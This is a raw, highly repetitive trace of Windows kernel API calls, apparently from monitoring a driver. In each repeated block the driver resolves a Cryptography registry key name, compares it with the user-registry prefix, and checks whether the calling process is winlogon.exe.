| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
